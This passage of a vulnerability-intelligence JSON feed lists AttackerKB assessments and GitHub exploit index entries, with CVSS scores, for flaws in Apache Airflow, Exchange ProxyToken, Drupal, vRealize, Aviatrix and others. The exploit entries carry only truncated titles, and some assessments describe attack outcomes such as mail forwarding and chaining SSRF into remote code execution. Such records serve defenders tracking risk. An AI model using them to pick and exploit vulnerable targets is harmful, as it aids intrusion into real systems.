"2023-06-05T14:43:16", "description": "The previous default setting for Airflow\u2019s Experimental API was to allow all API requests without authentication, but this poses security risks to users 
who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at <https://airflow.apache.org/docs/1.10.11/security.html#api-authentication>. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: <https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default>\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-13927", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2020-11-26T00:00:00", "id": "AKB:19F38141-ED73-4B57-8775-82311909B267", "href": "https://attackerkb.com/topics/0hz2sav215/cve-2020-13927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:18:52", "description": "Microsoft Exchange Information Disclosure 
Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at August 30, 2021 4:59pm UTC reported:\n\nAn unauthenticated actor can perform configuration actions on mailboxes belonging to arbitrary users, which can be used to copy all emails addressed to a target account and forward them to an account controlled by the threat actor.\n\n<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-33766 ProxyToken", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T00:00:00", "id": "AKB:B86FF102-0FBC-45A5-8D59-B98CA36BFCF9", "href": "https://attackerkb.com/topics/EYDEd51S7V/cve-2021-33766-proxytoken", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T14:43:17", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files 
being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T00:00:00", "type": "attackerkb", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2020-12-04T00:00:00", "id": "AKB:41008AC2-6B4D-484A-9C98-37DB9FC09AE1", "href": "https://attackerkb.com/topics/UUjNARl5Ha/cve-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T17:20:03", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14864", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2020-10-22T00:00:00", "id": "AKB:414279F0-5C79-45FF-ADC4-B00C0B17871D", "href": "https://attackerkb.com/topics/sM1eoX7sAX/cve-2020-14864", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-27T14:37:37", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow 
a malicious actor with network access to the vRealize Operations Manager API to perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-06-05T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "cvss": {"score": 8.5, "vector": 
"AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:33:30", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API to write files to arbitrary locations on the underlying Photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, 
"vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-12T14:00:38", "description": "# CVE-2020-11978: Remote code execution in Apache Airflow's Exa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-22T15:58:01", "type": "githubexploit", "title": "Exploit for Command Injection in Apache Airflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2022-03-12T08:27:13", "id": "873C5242-04CE-5F2F-94A2-1ED48BB27CEB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T10:01:15", "description": "<p align=\"center\">\n <img src=\"https://img.shields.io/badge/Ve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:19:12", "type": "githubexploit", "title": "Exploit for Interpretation Conflict in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-07-19T16:18:25", "id": "474D6E3C-62E7-510A-B8AB-493646E9B2E1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:38", "description": "# CVE-2021-40870\nUnrestricted upload of file with dange...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:35:40", "type": "githubexploit", "title": "Exploit for Interpretation Conflict in Aviatrix Controller", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-09T06:42:40", "id": "66AD8042-B9D2-5EC5-B1A6-E743A4AF2A7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T16:31:12", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-20T09:28:13", "type": "githubexploit", "title": "Exploit for Vulnerability in Octobercms October", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-20T09:30:12", "id": "FCAFCDD5-9440-5A5E-A5DD-51F88D1E4FC7", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:27:38", "description": "# CVE-2021-21315 Exploit\n- Des:\n\n\nMy python Scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-18T01:18:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-07-18T16:23:04", "id": "0E5869D4-37E8-526B-AD35-C6828C824560", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T03:46:34", "description": "# CVE-2021-21315-systeminformation\nThis is Proof of Concept for ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-01T18:52:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-08-14T18:56:52", "id": "972035A3-EFCA-59B4-BEF3-038086C30C32", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:32", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T11:47:18", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-13T02:06:37", "id": "6F08577F-952F-55B0-859B-596C18FE4C8E", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:44:11", "description": "# the CVE-2021-21315's 
exploit code wrote with Rust lang\n\nI'm ru...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T06:40:17", "type": "githubexploit", "title": "Exploit for OS Command Injection in Systeminformation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-12-27T01:30:24", "id": "6F52B47B-D9D5-5505-93DA-8E52F6FD6F22", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T18:30:14", "description": "## CVE-2021-33766 (ProxyToken)\n\n\u652f\u6301\u5355\u4e2a\u76ee\u6807\u68c0\u6d4b\u548c\u6279\u91cf\u68c0\u6d4b\u3001\u652f\u6301\u90ae\u4ef6\u8f6c\u53d1\u89c4\u5219\u4fee\u6539...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": 
"2021-09-15T09:09:20", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2022-03-31T04:32:57", "id": "F9AE0566-F0C6-57A4-8F79-DD8EB0A3BE64", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:46", "description": "## POC Exploit CVE-2021-33766 (ProxyToken)\n\nPOC Exploit for CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-31T22:03:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2023-05-05T16:11:57", "id": "F33D3024-CAB5-53F3-9685-6A1E68156853", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-21T15:56:32", "description": "# VMWare-vRealize-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T12:56:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-05-21T13:18:48", "id": "1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-30T20:26:21", "description": "# CVE-2021-21975\nNmap script to check vulnerability CVE-2021-219...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": 
